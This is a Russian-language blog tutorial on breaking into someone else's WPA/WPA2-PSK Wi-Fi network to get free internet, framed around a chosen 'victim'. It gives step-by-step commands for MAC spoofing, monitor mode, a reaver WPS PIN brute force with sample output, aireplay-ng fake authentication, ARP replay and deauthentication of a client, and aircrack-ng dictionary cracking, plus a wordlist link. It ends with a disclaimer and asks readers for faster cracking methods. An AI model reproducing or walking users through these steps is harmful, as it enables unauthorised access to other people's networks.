Казалось бы, нет денег — нет интернета, путь к светлой беспроводной мечте закрыт и ничего здесь не попишешь. Но мы пойдём другим путём — обходным. Рассмотрим две хитрых программы, способные раскрасить наши беспросветные будни яркими красками. Всё нижеизложенное осуществлялось под управлением ОС Linux, но в Windows одна из используемых программ имеется точно и имя ей aircrack-ng.

Задача: получение пароля точки доступа WPA/PSK или WPA2/PSK.

Предполагаемый алгоритм решения:

Меняем мак-адрес:

# ifconfig wlan0 hw ether 00:00:00:00:00:00

где 00:00:00:00:00:00 — ваш новый MAC-адрес.

При следующем входе в систему настройки будут сброшены.

Поднимаем сеть:

# ifconfig wlan0 up

Создаём виртуальный интерфейс:

# airmon-ng start wlan0

Заработает виртуальный интерфейс в режиме мониторинга, как правило он носит название mon0. Теперь необходимо просканировать сеть и выбрать предполагаемую жертву, дабы получить BSSID сети.

Начинаем прослушивать эфир:

# airodump-ng mon0

mon0

Использование утилиты reaver

Получив необходимые сведения, вписываем их вместо подчёркнутых

$ sudo reaver -i mon0 -b 20:4E:7F:37:73:82 --channel 1 -vv
  • mon0 - наш виртуальный интерфейс
  • ключ -b обозначает BSSID точки доступа
  • channel 1 - пробуем достучаться до первого “канала”
  • vv - расширенный вывод - нас будут уведомлять о происходящем

Какой канал использует наш удалённый друг мы можем видеть в поле CH.

Если всё складывается удачно, вывод должен быть примерно таким:

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 20:4E:7F:37:73:82
[+] Associated with 20:4E:7F:37:73:82 (ESSID: marisha24)
[+] Trying pin 12345670

Вот и всё. Теперь остаётся только долго ждать пока нам на блюдечке не поднесут нужные сведения. Автором сего поста был использован именно этот метод, как наиболее простой. Нижеприведённые на текущий момент носят сугубо теоретический характер.

Путь второй: продолжаем эксперименты с aircrack-ng

# airodump-ng --channel 1 --write networks.dump mon0
  • где 1 - номер канала
  • networks.dump - файл, в который будет сохранён результат

В другой консоли начинаем повтор ARP-пакетов:

# aireplay-ng --fakeauth 1 mon0 -e "linksys"
# aireplay-ng --arpreplay mon0 -e "linksys"
  • где “linksys” - ESSID (имя) сети

Возможно, понадобится ввести и BSSID, в данном случае для этого служит ключ -a:

$ sudo aireplay-ng --fakeauth 1 mon0 -e dan9iekb -a FC:75:16:CC:20:D8

и так далее

Когда ARP-пакет будет найдет, программа начнет повторять его в эфир.

Как только наберется достаточное количество пакетов (поле DATA, 30.000 пакетов должно быть достаточно), в следующей консоли подбираем пароль:

# aircrack-ng networks.dump

Ну и ждём, соответственно. Занятие это долгое, параллельно на другой машине успеете поставить gentoo. И не только поставить, а даже настроить =)

Либо ещё способ с тем же aircrack, опишу с нуля, дабы не запутать читателя:

# airodump-ng mon0 - высматриваем жертву
# airodump-ng -c 1 --bssid FC:75:16:CC:20:D8 -w data mon0 -  собираем данные о конкретной точке

Заставляем клиента переинициализироваться в сети:

# aireplay-ng -deauth 3 -a MAC_AP -c MAC_Client mon0
  • где MAC_AP - ваш мак-адрес
  • MAC_Client - адрес “того парня”

Способ хорош тем, что не придётся накапливать пакеты

# aircrack-ng -w wordlist capture_file
  • где wordlist – ваш словарь
  • capture_file – файл с данными, с расширением cap

Словари можно стянуть по адресу:

http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists

P.S. Автор не несёт ответственности за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Автор не использует полученные в результате эксперимента сведения, не разглашает их и даже не помнит. Не смотря на это ввиду любопытности темы всем сведующим лицам предлагается вносить свои правки и дополнения в комментариях: это может быть более лучший/быстрый метод взлома, могут быть ссылки на качественные словари — что угодно. ⤧  Следующая запись Синхронизация времени в linux